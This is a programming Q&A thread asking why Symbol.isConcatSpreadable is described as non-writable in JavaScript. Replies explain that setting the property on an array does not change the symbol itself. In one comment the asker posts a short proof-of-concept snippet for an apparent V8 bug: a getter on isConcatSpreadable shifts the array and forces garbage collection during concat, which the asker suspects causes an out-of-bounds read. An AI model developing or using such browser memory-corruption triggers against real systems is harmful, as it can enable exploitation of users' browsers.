# Why Symbol.isConcatSpreadable in Javascript is non-writable?

Tags: javascript, security, properties

Can be found in document:

```
Writable: no
Enumerable: no
Configurable: no
```

but I can change the value of it:

```
var a = [1, 2, 3];
undefined
a[Symbol.isConcatSpreadable]=false;
false
[4, 5, 6].concat(a);
(4) [4, 5, 6, Array(3)]
```

Comment: Looks like you are changing the value of an *array* actually, your `a`. ... Whereas `Symbol.isConcatSpreadable` is not being changed. Its data type is likely boolean given the naming convention of `is`, and a boolean can be an index to an array if you make it so, as you have done in your code.

Comment: Well, you cannot set the "isConcatSpreadable" property of the Symbol object. An array instance however does not contain a property descriptor for `Symbol.isConcatSpreadable`, so you can create a property with that key. `Object.getOwnPropertyDescriptor([], Symbol.isConcatSpreadable) // undefined`

Comment: As to the why: Why would you ever want to change it?

Comment: @JonasWilms I'm working on a chromium v8 redefinition bug, here's the poc:
```
function gcc(){
 var l = [];
 for(var i = 0; i < 0x1c000; i++){
  l.push(new Set());
 }
}

var arr = Array(2);
gc();
gc();

arr.concat({
 get [Symbol.isConcatSpreadable]() {
  arr.shift();
  gcc();
 }
});
```
It is a redefinition bug, an attacker can redefine isConcatSpreadable symbol and cause some security issue. Im curious about why it should not be redefined.

Comment: and what is that poc supposed to show?

Comment: out-of-bound read i think. but i dont know how this works.